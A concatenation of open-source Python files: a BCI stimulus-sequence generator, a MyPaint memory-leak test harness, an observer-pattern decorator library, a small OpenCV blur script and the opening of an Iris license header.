if not self.stimSeq is None:
res += "(" + str(len(self.stimSeq[0])) + "," + str(len(self.stimSeq)) + ")\n"
for j in range(0,len(self.stimSeq[0])):
for i in range(len(self.stimSeq)-1):
res += str(self.stimSeq[i][j]) + " "
res+= str(self.stimSeq[-1][j]) + "\n"
else:
res+= "<null>\n"
res+="\n\n"
return res
@staticmethod
def readArray(f,width=-1):
array=[]
nEmpty=0
for line in f:
line = line.strip();
if len(line)==0 :
nEmpty += 1
if nEmpty>1 and len(array)>0 : break # double empty means end-of-array
else: continue
elif line[0]=="#" : continue # comment line
cols = line.split();
            if width<0 : width=len(cols) # use the column count (not the character count) as the expected width
            elif width>0 and not len(cols) == width :
                raise ValueError("row has %d columns but %d were expected" % (len(cols), width))
cols = [ float(c) for c in cols ] # convert string to numeric
array.append(cols) # add to the stimSeq
return array
@staticmethod
def fromString(fname):
f=open(fname,'r') if type(fname) is str else fname
st=StimSeq.readArray(f) # read the stim times
        if len(st)>1 : raise ValueError("expected a single row of stimulus times")
else: st=st[0] # un-nest
ss=StimSeq.readArray(f,len(st)) # read stim-seq - check same length
# transpose ss to have time in the major dimension
        # build each row independently: [[None]*n]*m would alias the same row m times
        ss2=[ [None]*len(ss) for _ in range(len(ss[0])) ]
for s in range(len(ss)):
for t in range(len(ss[s])):
ss2[t][s]=ss[s][t]
return StimSeq(st,ss2)
@staticmethod
def mkStimSeqScan(nSymb, seqDuration, isi):
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ei in range(nEvent):
stimSeq[ei][ei%nSymb]=1
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqRand(nSymb, seqDuration, isi):
perm = [i for i in range(nSymb)] # pre-alloc order for later shuffle
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ri in range(0,nEvent,nSymb):
shuffle(perm)
for ei in range(nSymb):
if ri+ei < len(stimSeq): # don't go past the end
stimSeq[ri+ei][perm[ei]]=1
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqOddball(nSymb, seqDuration, isi, tti=None, distractor=False):
# TODO: [] add check to minimize cross-talk with other symbols
nEvent = int(seqDuration/isi) + 1
tti_ev = tti/isi if not tti is None else nSymb # ave num events between targets
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ei in range(nSymb):
si= 1+random()*tti_ev # last stimulus time
for ri in range(0,nEvent):
stimSeq[ri][ei] = 0
if ri==int(si) :
stimSeq[ri][ei] = 1
si = si + tti_ev*(.5 + random()) # step [.5-1.5]*tti
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqNoise(nSymb, seqDuration, isi, weight=.5):
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ei in range(nEvent):
for si in range(nSymb):
if random() > weight :
stimSeq[ei][si]=1
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqSSEP(nSymb, seqDuration, isi, periods=None, smooth=False):
# N.B. Periods is in *seconds*
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for si in range(nSymb):
if not type(periods[si]) is list: # ensure periods has duration and phase
periods[si] = [periods[si],0]
for ei in range(nEvent):
# N.B. include slight phase offset to prevent value being exactly==0
stimSeq[ei][si]=cos((stimTime_ms[ei]/1000.0+.0001+periods[si][1])/periods[si][0]*2*pi);
if smooth :
stimSeq[ei][si]=(stimSeq[ei][si]+1)/2; # ensure all positive values in range 0-1
else:
stimSeq[ei][si]=1 if stimSeq[ei][si]>0 else 0
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqInterval(nSymb, seqDuration, isi, periods=None):
# N.B. Periods is in *seconds*
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for si in range(nSymb):
for ii in range(0,int(seqDuration/periods[si])+1):
ei = int(round(ii*periods[si]/isi)) # convert to event number
if ei < nEvent: stimSeq[ei][si]=1
return StimSeq(stimTime_ms,stimSeq)
def phaseShiftKey(self,speedup=False):
''' Convert a normal encoded stim sequence into a phase-shift-keyed version where
0 -> 01, and 1 -> 10.
speedup - if true then keep duration the same but half the isi, false = double duration.'''
if speedup:
st=[]
for i in range(len(self.stimTime_ms)-1): # insert new point between existing ones
st += [self.stimTime_ms[i], self.stimTime_ms[i]+(self.stimTime_ms[i+1]-self.stimTime_ms[i])//2]
st += [self.stimTime_ms[-1],
self.stimTime_ms[-1]+(self.stimTime_ms[-1]-self.stimTime_ms[-2])//2]
else:
# start again 1 isi after the end
offset = self.stimTime_ms[-1]+self.stimTime_ms[1]-self.stimTime_ms[0]
st=self.stimTime_ms + [i+offset for i in self.stimTime_ms]
self.stimTime_ms=st
ss = [[None]*len(self.stimSeq[0]) for i in range(len(self.stimSeq)*2)]
for ei in range(len(self.stimSeq)):
ss[ei*2] = self.stimSeq[ei]
ss[ei*2+1] = [0 if ssei==1 else 1 for ssei in self.stimSeq[ei]]
self.stimSeq=ss
return self
# testcase code
if __name__ == "__main__":
    print("Noise:" + str(StimSeq.mkStimSeqNoise(4,3,.1)))
    print("Scan: " + str(StimSeq.mkStimSeqScan(4,3,.1)))
    print("Rand: " + str(StimSeq.mkStimSeqRand(4,3,.1)))
    print("Odd: " + str(StimSeq.mkStimSeqOddball(1,3,.4)))
    print("SSEP: " + str(StimSeq.mkStimSeqSSEP(4,3,.1,[x*.1 for x in [2,3,4,5]])))
    print("gold: " + str(StimSeq.fromString("../../stimulus/gold_10hz.txt")))
    print("interval:" + str(StimSeq.mkStimSeqInterval(2,4,.15,[3*.15,4*.15])))
    print("Scan(psk): " + str(StimSeq.mkStimSeqScan(4,3,.1).phaseShiftKey()))
| jadref/buffer_bci | python/signalProc/stimseq.py | Python | gpl-3.0 | 8,316 |
#!/usr/bin/env python
import numpy
from time import time
import sys
import os
import gc
os.chdir(os.path.dirname(sys.argv[0]))
sys.path.insert(0, '..')
from lib import mypaintlib, tiledsurface, brush, document, command, helpers
import guicontrol
# loadtxt is known to leak memory, thus we run it only once
# http://projects.scipy.org/numpy/ticket/1356
painting30sec_events = numpy.loadtxt('painting30sec.dat')
LEAK_EXIT_CODE = 33
def mem():
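    # total program size in pages, read from /proc/self/statm (Linux-specific)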
gc.collect()
return int(open('/proc/self/statm').read().split()[0])
def check_garbage(msg='uncollectable garbage left over from previous tests'):
gc.collect()
garbage = []
for obj in gc.garbage:
# ignore garbage generated by numpy loadtxt command
if hasattr(obj, 'filename') and obj.filename == 'painting30sec.dat':
continue
garbage.append(obj)
assert not garbage, 'uncollectable garbage left over from previous tests: %s' % garbage
def iterations():
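    # Heuristic: the test passes once the peak page count has been stable for
    # `options.required` consecutive iterations, and fails if new peaks keep
    # appearing for that many iterations in a row (or the iteration limit is hit).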
check_garbage()
max_mem = 0
max_mem_stable = 0
max_mem_increasing = 0
leak = True
m1 = 0
for i in range(options.max_iterations):
yield i
if options.debug:
if i == 3:
check_garbage()
helpers.record_memory_leak_status()
if i == 4 or i == 5:
helpers.record_memory_leak_status(print_diff=True)
m2 = mem()
print 'iteration %02d/%02d: %d pages used (%+d)' % (i+1, options.max_iterations, m2, m2-m1)
m1 = m2
if m2 > max_mem:
max_mem = m2
max_mem_stable = 0
max_mem_increasing += 1
if max_mem_increasing == options.required:
print 'maximum was always increasing for', max_mem_increasing, 'iterations'
break
else:
max_mem_stable += 1
max_mem_increasing = 0
if max_mem_stable == options.required:
print 'maximum was stable for', max_mem_stable, 'iterations'
leak = False
break
check_garbage()
if leak:
print 'memory leak found'
sys.exit(LEAK_EXIT_CODE)
else:
print 'no leak found'
all_tests = {}
def leaktest(f):
"decorator to declare leak test functions"
all_tests[f.__name__] = f
return f
#@leaktest
def provoke_leak():
for i in iterations():
# note: interestingly this leaky only shows in the later iterations
# (and very small leaks might not be detected)
setattr(gc, 'my_test_leak_%d' % i, numpy.zeros(50000))
@leaktest
def noleak():
for i in iterations():
setattr(gc, 'my_test_leak', numpy.zeros(50000))
@leaktest
def document_alloc():
for i in iterations():
doc = document.Document()
doc.cleanup()
@leaktest
def surface_alloc():
for i in iterations():
tiledsurface.Surface()
def paint_doc(doc):
events = painting30sec_events
t_old = events[0][0]
layer = doc.layer_stack.current
for i, (t, x, y, pressure) in enumerate(events):
dtime = t - t_old
t_old = t
layer.stroke_to(doc.brush, x, y, pressure, 0.0, 0.0, dtime)
@leaktest
def save_test():
doc = document.Document()
paint_doc(doc)
for i in iterations():
doc.save('test_leak.ora')
doc.save('test_leak.png')
doc.save('test_leak.jpg')
doc.cleanup()
@leaktest
def repeated_loading():
doc = document.Document()
for i in iterations():
doc.load('bigimage.ora')
doc.cleanup()
@leaktest
def paint_save_clear():
doc = document.Document()
for i in iterations():
paint_doc(doc)
doc.save('test_leak.ora')
doc.clear()
doc.cleanup()
def paint_gui(gui):
"""
Paint with a constant number of frames per recorded second.
Not entirely realistic, but gives good and stable measurements.
"""
FPS = 30
gui_doc = gui.app.doc
model = gui_doc.model
tdw = gui_doc.tdw
b = gui.app.brushmanager.get_brush_by_name('redbrush')
gui.app.brushmanager.select_brush(b)
events = list(painting30sec_events)
t_old = 0.0
t_last_redraw = 0.0
for t, x, y, pressure in events:
if t > t_last_redraw + 1.0/FPS:
gui.wait_for_gui()
t_last_redraw = t
dtime = t - t_old
t_old = t
x, y = tdw.display_to_model(x, y)
gui_doc.modes.top.stroke_to(model, dtime, x, y, pressure, 0.0, 0.0)
@leaktest
def gui_test():
# NOTE: this an all-in-one GUI test as a workaround for the
# problem that the GUI does not cleanly terminate after the test fork()
gui = guicontrol.GUI()
gui.wait_for_idle()
gui.app.filehandler.open_file(u'bigimage.ora')
gui_doc = gui.app.doc
for i in iterations():
gui.app.filehandler.open_file(u'smallimage.ora')
gui.wait_for_idle()
paint_gui(gui)
gui.app.filehandler.save_file(u'test_save.ora')
gui.scroll()
gui_doc.zoom(gui_doc.ZOOM_OUTWARDS)
gui.scroll()
gui_doc.zoom(gui_doc.ZOOM_INWARDS)
if __name__ == '__main__':
import logging
logging.basicConfig(level=logging.INFO)
from optparse import OptionParser
parser = OptionParser('usage: %prog [options] [test1 test2 test3 ...]')
parser.add_option(
'-a',
'--all',
action='store_true',
default=False,
help='run all tests'
)
parser.add_option(
'-l',
'--list',
action='store_true',
default=False,
help='list all available tests'
)
parser.add_option(
'-d',
'--debug',
action='store_true',
default=False,
help='print leak analysis (slow)'
)
parser.add_option(
'-e',
'--exit',
action='store_true',
default=False,
help='exit at first error'
)
parser.add_option(
'-r',
'--required',
type='int',
default=15,
help='iterations required to draw a conclusion (default: 15)'
)
parser.add_option(
'-m',
'--max-iterations',
type='int',
default=100,
help='maximum number of iterations (default: 100)'
)
options, tests = parser.parse_args()
if options.list:
for name in sorted(all_tests.keys()):
print name
sys.exit(0)
if options.required >= options.max_iterations:
print 'requiring more good iterations than the iteration limit makes no sense'
sys.exit(1)
if not tests:
if options.all:
tests = list(all_tests)
else:
parser.print_help()
sys.exit(1)
for t in tests:
if t not in all_tests:
print 'Unknown test:', t
sys.exit(1)
results = []
for t in tests:
child_pid = os.fork()
if not child_pid:
print '---'
print 'running test "%s"' % t
print '---'
all_tests[t]()
sys.exit(0)
pid, status = os.wait()
exitcode = os.WEXITSTATUS(status)
if options.exit and exitcode != 0:
sys.exit(1)
results.append(exitcode)
everything_okay = True
print
print '=== SUMMARY ==='
for t, exitcode in zip(tests, results):
if exitcode == 0:
print t, 'OK'
else:
everything_okay = False
if exitcode == LEAK_EXIT_CODE:
print t, 'LEAKING'
else:
print t, 'EXCEPTION'
if not everything_okay:
sys.exit(1)
| dothiko/mypaint | tests/test_memory_leak.py | Python | gpl-2.0 | 7,613 |
"""
This module implements the observer design pattern.
It provides two decorators:
observable_function
observable_method
which you use to make functions and methods observable by other functions and
methods. For example:
@observable_function
def observed_func(x):
print("observed_func called with arg %s"%(x,))
def observing_func(x):
print("observing_func called with arg %s"%(x,))
observed_func.add_observer(observing_func)
observed_func('banana')
>>> observed_func called with arg banana
>>> observing_func called with arg banana
When registering observers, if the optional argument identify_observed is set
to True, then when the observers are called, the observed object will be
passed as the first argument:
def observing_func2(obj, x):
print("observing_func2 called with arg %s"%(x,))
print("I was called by %s"%(obj.__name__,))
observed_func.add_observer(observing_func2, identify_observed=True)
observed_func('banana')
>>> observed_func called with arg banana
>>> observing_func called with arg banana
>>> observing_func2 called with arg banana
>>> I was called by observed_func
Methods can be observed as well:
class Foo:
@observable_method()
def bar(self, x):
print("bar called with argument %s"%(x,))
f = Foo()
f.bar.add_observer(observing_func)
f.bar('banana')
>>> bar called with argument banana
>>> observing_func called with argument banana
Any function or bound method can be registered as an observer, and any
function or method decorated with observable_function or observable_method
can be observed. Decorated functions and methods can be observers too.
Unregister observers like this:
observed_func.discard_observer(observing_func)
observed_func.discard_observer(observing_func2)
observed_func('banana')
>>> observed_func called with arg banana
For more information, see the docstrings for observable_function and
observable_method. If you're a developer trying to understand how the code
works, I recommend starting with ObservableFunction, and then ObserverFunction
and ObserverBoundMethod.
"""
import weakref
import functools
__version__ = "0.5.3"
INSTANCE_OBSERVER_ATTR = "_observed__observers"
class ObserverFunction:
"""Wraps a function which is registered as an observer.
I use a weak reference to the observing function so that being an observer
does not prevent garbage collection of the observing function.
"""
def __init__(self, func, identify_observed, weakref_info):
"""Initialize an ObserverFunction.
Args:
func: function I wrap. I call this function when I am called.
identify_observed: boolean indicating whether or not I will pass
the observed object as the first argument to the function I
wrap. True means pass the observed object, False means do not
                pass the observed object.
weakref_info: Tuple of (key, dict) where dict is the dictionary
which is keeping track of my role as an observer and key is
the key in that dict which maps to me. When the function I wrap
is finalized, I use this information to delete myself from the
dictionary.
"""
# For some reason, if we put the update_wrapper after we make the
# weak reference to func, the call to weakref.ref returns a function
# instead of a weak ref. So, don't move the next line chomp, chomp...
functools.update_wrapper(self, func)
self.identify_observed = identify_observed
key, d = weakref_info
self.func_wr = weakref.ref(func, CleanupHandler(key, d))
def __call__(self, observed_obj, *arg, **kw):
"""Call the function I wrap.
Args:
*arg: The arguments passed to me by the observed object.
**kw: The keyword args passed to me by the observed object.
observed_obj: The observed object which called me.
Returns:
Whatever the function I wrap returns.
"""
if self.identify_observed:
return self.func_wr()(observed_obj, *arg, **kw)
else:
return self.func_wr()(*arg, **kw)
class ObserverBoundMethod:
"""I wrap a bound method which is registered as an observer.
I use a weak reference to the observing bound method's instance so that
being an observer does not prevent garbage collection of that instance.
"""
def __init__(self, inst, method_name, identify_observed, weakref_info):
"""Initialize an ObserverBoundMethod.
Args:
inst: the object to which the bound method I wrap is bound.
method_name: the name of the method I wrap.
identify_observed: boolean indicating whether or not I will pass
the observed object as the first argument to the function I
wrap. True means pass the observed object, False means do not
                pass the observed object.
weakref_info: Tuple of (key, dict) where dict is the dictionary
which is keeping track of my role as an observer and key is
the key in that dict which maps to me. When the function I wrap
is finalized, I use this information to delete myself from the
dictionary.
"""
self.identify_observed = identify_observed
key, d = weakref_info
self.inst = weakref.ref(inst, CleanupHandler(key, d))
self.method_name = method_name
def __call__(self, observed_obj, *arg, **kw):
"""Call the function I wrap.
Args:
*arg: The arguments passed to me by the observed object.
**kw: The keyword args passed to me by the observed object.
observed_obj: The observed object which called me.
Returns:
Whatever the function I wrap returns.
"""
bound_method = getattr(self.inst(), self.method_name)
if self.identify_observed:
return bound_method(observed_obj, *arg, **kw)
else:
return bound_method(*arg, **kw)
class ObservableFunction:
"""A function which can be observed.
I wrap a function and allow other callables to register as observers of it.
If you have a function func, then ObservableFunction(func) is a wrapper
around func which can accept observers.
Add and remove observers using:
add_observer(observer)
registers observer to be called whenever I am called
discard_observer(observer)
Removes an observer from the set of observers.
Attributes:
func: The function I wrap.
observers: Dict mapping keys unique to each observer to that observer.
If this sounds like a job better served by a set, you're probably
right and making that change is planned. It's delicate because it
requires making sure the observer objects are hashable and have a
proper notion of equality.
"""
def __init__(self, func):
"""Initialize an ObservableFunction.
Args:
func: The function I wrap.
"""
functools.update_wrapper(self, func)
self.func = func
self.observers = {} # observer key -> observer
def add_observer(self, observer, identify_observed=False):
"""Register an observer to observe me.
Args:
observer: The callable to register as an observer.
identify_observed: If True, then the observer will get myself
passed as an additional first argument whenever it is invoked.
See ObserverFunction and ObserverBoundMethod to see how this
works.
Returns:
True if the observer was added, False otherwise.
The observing function or method will be called whenever I am called,
and with the same arguments and keyword arguments.
If a bound method or function has already been registered as an
observer, trying to add it again does nothing. In other words, there is
no way to sign up an observer to be called back multiple times. This
was a conscious design choice which users are invited to complain about
if there is a compelling use case where this is inconvenient.
"""
# If the observer is a bound method,
if hasattr(observer, "__self__"):
result = self._add_bound_method(observer, identify_observed)
# Otherwise, assume observer is a normal function.
else:
result = self._add_function(observer, identify_observed)
return result
def _add_function(self, func, identify_observed):
"""Add a function as an observer.
Args:
func: The function to register as an observer.
identify_observed: See docstring for add_observer.
Returns:
True if the function is added, otherwise False.
"""
key = self.make_key(func)
if key not in self.observers:
self.observers[key] = ObserverFunction(
func, identify_observed, (key, self.observers))
return True
else:
return False
def _add_bound_method(self, bound_method, identify_observed):
"""Add an bound method as an observer.
Args:
bound_method: The bound method to add as an observer.
identify_observed: See the docstring for add_observer.
Returns:
True if the bound method is added, otherwise False.
"""
inst = bound_method.__self__
method_name = bound_method.__name__
key = self.make_key(bound_method)
if key not in self.observers:
self.observers[key] = ObserverBoundMethod(
inst, method_name, identify_observed, (key, self.observers))
return True
else:
return False
def discard_observer(self, observer):
"""Un-register an observer.
Args:
observer: The observer to un-register.
Returns true if an observer was removed, otherwise False.
"""
discarded = False
key = self.make_key(observer)
if key in self.observers:
del self.observers[key]
discarded = True
return discarded
@staticmethod
def make_key(observer):
"""Construct a unique, hashable, immutable key for an observer."""
if hasattr(observer, "__self__"):
inst = observer.__self__
method_name = observer.__name__
key = (id(inst), method_name)
else:
key = id(observer)
return key
def __call__(self, *arg, **kw):
"""Invoke the callable which I proxy, and all of my observers.
The observers are called with the same *args and **kw as the main
callable.
Args:
*arg: The arguments you want to pass to the callable which I wrap.
**kw: The keyword args you want to pass to the callable I wrap.
Returns:
Whatever the wrapped callable returns.
Note:
I think it is possible for observers to disappear while we execute
them. It might be better to make strong references to all
observers before we start callback execution, since we don't keep
strong references elsewhere.
"""
result = self.func(*arg, **kw)
for key in self.observers:
self.observers[key](self, *arg, **kw)
return result
class ObservableBoundMethod(ObservableFunction):
"""I wrap a bound method and allow observers to be registered."""
def __init__(self, func, inst, observers):
"""Initialize an ObservableBoundMethod.
Args:
func: The function (i.e. unbound method) I wrap.
inst: The instance to which I am bound.
observers: Dict mapping keys unique to each observer to that
observer. This dict comes from the descriptor which generates
this ObservableBoundMethod instance. In this way, multiple
instances of ObservableBoundMethod with the same underlying
object instance and method all add, remove, and call observers
from the same collection.
If you think this dict should probably be a set instead then
you probably grok this module.
"""
self.func = func
functools.update_wrapper(self, func)
self.inst = inst
self.observers = observers
def __call__(self, *arg, **kw):
"""Invoke the bound method I wrap, and all of my observers.
The observers are called with the same *args and **kw as the bound
method I wrap.
Args:
*arg: The arguments you want to pass to the callable which I wrap.
**kw: The keyword args you want to pass to the callable I wrap.
Returns:
Whatever the wrapped bound method returns.
Note:
I think it is possible for observers to disappear while we execute
them. It might be better to make strong references to all
observers before we start callback execution, since we don't keep
strong references elsewhere.
"""
result = self.func(self.inst, *arg, **kw)
for key in self.observers:
self.observers[key](self, *arg, **kw)
return result
def __eq__(self, other):
"""Check equality of this bound method with another."""
return all((
self.inst == other.inst,
self.func == other.func))
@property
def __self__(self):
"""The instance to which I'm bound."""
return self.inst
"""
The following two classes are descriptors which manage access to observable
methods. Suppose we have a class Foo with method bar, and suppose we have an
instance foo of Foo. When Python sees foo.bar it creates and returns a bound
method. Regular bound methods don't support registering observers. Therefore,
we use descriptors to intercept the .bar access. The descriptor creates a
wrapper around the usual bound method. This wrapper can accept observers.
Now, how do we keep track of registered observers? We can't just store them as
attributes of the ObservableBoundMethod because the ObservableBoundMethod
doesn't necessarily live very long. If we do
foo.bar.add_observer(some_observer)
and then later call
foo.bar(...)
the ObservableBoundMethod active in those two cases are not the same object.
Therefore, we must persist the observers somewhere else. An obvious option is
to store the observers as an attribute of foo. This strategy is implemented in
ObservableMethodManager_PersistOnInstances. The other strategy is to persist the
observers within the descriptor itself. In this strategy, the descriptor holds
a mapping from instance id's to mappings from methods to observers. This
strategy is implemented in ObservableMethodManager_PersistOnDescriptor.
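(Editor addition, illustrative: every attribute access goes through one of the
descriptors below and builds a *new* ObservableBoundMethod, e.g.

    foo.bar is foo.bar          # False: two distinct wrapper objects
    foo.bar.add_observer(cb)
    foo.bar('x')                # cb is still notified

which is why the observers must live on the instance or on the descriptor rather
than on the short-lived wrapper itself.)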
"""
class ObservableMethodManager_PersistOnInstances:
"""I manage access to observable methods.
When accessed through an instance I return an ObservableBoundMethod.
When accessed through a class I return an ObservableUnboundMethod.
When an instance accesses me, I create an ObservableBoundMethod for that
instance and return it.
"""
def __init__(self, func):
"""Initialize an ObservableMethodManager_PersistOnInstances.
Args:
func: the function (i.e.unbound method) I manage.
"""
self._func = func
self._unbound_method = ObservableUnboundMethod(self)
def __get__(self, inst, cls):
"""Return an ObservableBoundMethod or ObservableUnboundMethod.
If accessed by instance, I return an ObservableBoundMethod which
handles that instance. If accessed by class I return an
ObservableUnboundMethod.
Args:
inst: The instance through which I was accessed. This will be None
if I was accessed through the class, i.e. as an unbound method.
cls: The class through which I was accessed.
"""
if inst is None:
return self._unbound_method
else:
if not hasattr(inst, INSTANCE_OBSERVER_ATTR):
d = {}
setattr(inst, INSTANCE_OBSERVER_ATTR, d)
else:
d = getattr(inst, INSTANCE_OBSERVER_ATTR)
observers = d.setdefault(self._func.__name__, {})
return ObservableBoundMethod(self._func, inst, observers)
def __set__(self, inst, val):
"""Disallow setting because we don't guarantee behavior."""
raise RuntimeError("Assignment not supported")
class ObservableMethodManager_PersistOnDescriptor:
"""Manage access to observable methods.
When accessed through an instance I return an ObservableBoundMethod.
When accessed through a class I return an ObservableUnboundMethod.
Instead of storing observers as attributes on the instances whose bound
method is being observed, I store them here.
I store no strong references to the instances I manage. This guarantees
that I don't prevent garbage collection of those instances.
When an instance accesses me, I create an ObservableBoundMethod for that
instance and return it. Observers added to that ObservableBoundMethod, are
persisted by me, not as attributes of the instances.
"""
# We persist the observers here because if we try to persist them inside
# the ObservableBoundMethods then we have to persist the
# ObservableBoundMethods. That would be bad, because then the reference to
# the inst inside the ObservableBoundMethod would be persisted and would
# prevent garbage collection of the inst. We can't use a weak ref to fix
# this because the ObservableBoundMethod _should_ prevent garbage
# collection of the inst as long as the ObservableBoundMethod is alive. If
# this doesn't make sense draw a picture of what references what and it
# will become clear.
# The other option is to persist the observers as attributes of the
# instances themselves, which is done by
# ObservableMethodManager_PersistOnInstances.
def __init__(self, func):
"""Initialize an ObservableMethodManager_PersistOnDescriptor.
func is the function I will give to the ObservableBoundMethods I create.
"""
self._func = func
self._unbound_method = ObservableUnboundMethod(self)
# instance id -> (inst weak ref, observers)
self.instances = {}
def __get__(self, inst, cls):
"""Return an ObservableBoundMethod or ObservableUnboundMethod.
If accessed by instance I return an ObservableBoundMethod which handles
that instance.
If accessed by class I return an ObservableUnboundMethod.
"""
if inst is None:
return self._unbound_method
# Only weak references to instances are stored. This guarantees that
# the descriptor cannot prevent the instances it manages from being
# garbage collected.
# We can't use a WeakKeyDict because not all instances are hashable.
# Instead we use the instance's id as a key which maps to a tuple of a
# weak ref to the instance, and the observers for that instance. The
# weak ref has an expiration callback set up to clear the dict entry
# when the instance is finalized.
inst_id = id(inst)
if inst_id in self.instances:
wr, observers = self.instances[inst_id]
if wr() is None:
msg = "Unreachable: instance id=%d not cleaned up"%(inst_id,)
raise RuntimeError(msg)
else:
wr = weakref.ref(inst, CleanupHandler(inst_id, self.instances))
observers = {}
self.instances[inst_id] = (wr, observers)
return ObservableBoundMethod(self._func, inst, observers)
def __set__(self, inst, val):
"""Disallow setting because we don't guarantee behavior."""
raise RuntimeError("Assignment not supported")
class ObservableUnboundMethod:
"""Wrapper for an unbound version of an observable method."""
def __init__(self, manager):
""" Create an ObservableUnboundMethod.
Args:
manager: the descriptor in charge of this method. See
ObservableMethodManager.
"""
self._manager = manager
functools.update_wrapper(self, manager._func)
def __call__(self, obj, *arg, **kw):
""" Call the unbound method.
We essentially build a bound method and call that. This ensures that
        the code for managing observers is invoked in the same way as it would
be for a bound method.
"""
bound_method = self._manager.__get__(obj, obj.__class__)
return bound_method(*arg, **kw)
class CleanupHandler:
"""Manage removal of weak references from their storage points.
Use me as a weakref.ref callback to remove an object's id from a dict when
that object is garbage collected.
"""
def __init__(self, key, d):
""" Initialize a cleanup handler.
Args:
key: the key we will delete.
d: the dict from which we will delete it.
"""
self.key = key
self.d = d
def __call__(self, wr):
"""Remove an entry from the dict.
When a weak ref's object expires, the CleanupHandler is called, which
invokes this method.
Args:
wr: The weak reference being finalized.
"""
if self.key in self.d:
del self.d[self.key]
def observable_function(func):
"""Decorate a function to make it observable.
Use me as a decorator on a function, like this:
@observable_function
def my_func(x):
print("my_func called with arg: %s"%(x,))
def callback(x):
print("callback called with arg: %s"%(x,))
class Foo:
def bar(self, x):
print("Foo object's .bar called with arg: %s"%(x,))
foo = Foo()
my_func.add_observer(callback)
my_func.add_observer(foo.bar)
my_func('banana')
>>> my_func called with arg: banana
>>> callback called with arg: banana
>>> Foo object's .bar called with arg: banana
Unregister observers like this:
my_func.discard_observer(callback)
"""
return ObservableFunction(func)
def get_observable_method(func, strategy):
"""Decorate a method to make it observable.
You can use me as a decorator on a method, like this:
class Foo:
        def __init__(self, name):
self.name = name
        @observable_method()
def bar(self, x):
print("%s called bar with arg: %s"%(self.name, x))
    Now other functions and methods can sign up to get notified when bar is
called:
def observer(x):
print("observer called with arg: %s"%(x,))
a = Foo('a')
b = Foo('b')
a.bar.add_observer(observer)
a.bar.add_observer(b.bar)
a.bar('banana')
>>> a called bar with arg: banana
>>> b called bar with arg: banana
>>> observer called with arg: banana
Note that bar can be an observer as well as observed.
Unregister observers like this:
a.bar.discard_observer(observer)
Args:
func: The function (i.e. method) to be made observable.
strategy: When observers are registered to a bound method, we need to
store those observers so that we can call them when the observed
method is called. There are two ways to do this as explained below.
In any case, access to the observable method is managed by a
descriptor, and we select which strategy we use for storing observers
by selecting one of two descriptors. The strategy argument selects
the descriptor.
The first strategy is to give each instance of the class containing
the decorated method an attribute whose value is a mapping from
observable method to the functions observing that method. This is
the default strategy and is implemented in
ObservableMethodManager_PersistOnInstances.
The advantages of this strategy are that the code is very simple
and pickling the observers along with the instance owning the
observable methods is easier.
The other strategy is to persist the observers for each instance
inside the descriptor which manages access to that method. This
strategy is implemented in
ObservableMethodManager_PersistOnDescriptor.
The advantage of this strategy is that it doesn't paste any data
onto the instances which have observable methods.
For the simpler strategy in which we store the observers in the
instances, just use me as a decorator. If you want the alternate
strategy in which the observers are stored in the descriptor,
call me explicitly on the function (unbound method) you want to
make observable and set strategy='descriptor'.
"""
if strategy == 'instances':
return ObservableMethodManager_PersistOnInstances(func)
elif strategy == 'descriptor':
return ObservableMethodManager_PersistOnDescriptor(func)
else:
raise ValueError(f"Strategy {strategy} not recognized")
def observable_method(strategy='instances'):
return lambda func: get_observable_method(func, strategy=strategy)
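# --- Hedged usage sketch (editor addition, not part of the original library) ---
# Demonstrates the two observer-storage strategies selected via `strategy`.
# The class and function names below are illustrative only.
if __name__ == "__main__":
    class _Sensor:
        @observable_method()  # default: observers stored as an attribute on each instance
        def reading(self, value):
            print(f"reading called with {value}")

        @observable_method(strategy='descriptor')  # observers stored inside the descriptor
        def status(self, value):
            print(f"status called with {value}")

    def _log(value):
        print(f"observer saw {value}")

    sensor = _Sensor()
    sensor.reading.add_observer(_log)
    sensor.status.add_observer(_log)
    sensor.reading(1)       # -> "reading called with 1" then "observer saw 1"
    sensor.status("ok")     # -> "status called with ok" then "observer saw ok"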
| DanielSank/observed | observed.py | Python | mit | 25,883 |
#!/usr/bin/env python
import numpy as np
import cv2
from matplotlib import pyplot as plt
img = cv2.imread('fruits.jpg', 1)
cv2.imshow('image', img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
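# (75, 1) Gaussian kernel: strong horizontal smoothing, none vertically;
# sigma=0 lets OpenCV derive the sigma from the kernel size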
blur = cv2.GaussianBlur(img, (75, 1), 0)
cv2.namedWindow('blur', cv2.WINDOW_NORMAL)
cv2.imshow('blur', blur)
cv2.waitKey(0)
cv2.destroyAllWindows()
# http://stackoverflow.com/a/15074748/1134940
# img = img[:,:,::-1]
# plt.imshow(img, interpolation = 'bicubic')
# plt.xticks([]), plt.yticks([])
# plt.show()
| ultranaut/fuzzy | still.py | Python | mit | 505 |
# (C) British Crown Copyright 2013 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
